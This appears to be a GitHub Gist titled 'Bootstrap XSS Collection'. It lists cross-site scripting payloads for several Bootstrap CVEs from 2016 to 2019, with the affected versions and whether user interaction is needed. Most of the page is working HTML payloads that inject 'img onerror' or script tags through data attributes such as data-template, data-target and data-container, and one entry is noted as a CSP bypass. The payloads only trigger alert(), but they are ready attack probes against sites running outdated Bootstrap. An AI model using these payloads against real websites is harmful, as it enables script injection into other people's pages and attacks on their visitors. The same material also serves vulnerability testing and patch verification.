Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

Requires user interaction

Requires $('[data-toggle="tooltip"]').tooltip();

<x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>

CVE-2018-20677

Bootstrap < 3.4.0

✔️ Without user interaction

<x data-spy="affix" data-target="<img src=x onerror=alert(1)>">

CVE-2018-20676

Bootstrap < 3.4.0

✔️ Without user interaction

Requires $('[data-toggle="tooltip"]').tooltip();

<x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x>

CVE-2018-14040

Bootstrap < 3.4.0 || < 4.1.2

Requires user interaction

<a id="x" data-toggle="collapse" href="#x" data-parent="<img src=x onerror=alert(1) />">XSS</a>

CVE-2018-14041

Bootstrap < 3.4.0 || < 4.1.2

✔️ Without user interaction

<x data-spy="scroll" data-target="<img src=x onerror=alert(1) />">XSS</x>

CVE-2018-14042

Bootstrap < 3.4.0 || < 4.1.2

Requires user interaction

Requires $('[data-toggle="tooltip"]').tooltip();

<x data-toggle="tooltip" data-container="<img src=x onerror=alert(1) />" title="x">XSS</x>

CVE-2016-10735

Bootstrap < 3.4.0 || v4.0.0-beta

Requires user interaction

<x href="<img src=x onerror=alert(0)>" data-dismiss="alert">XSS</x>
<x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x>
<x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x>
etc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.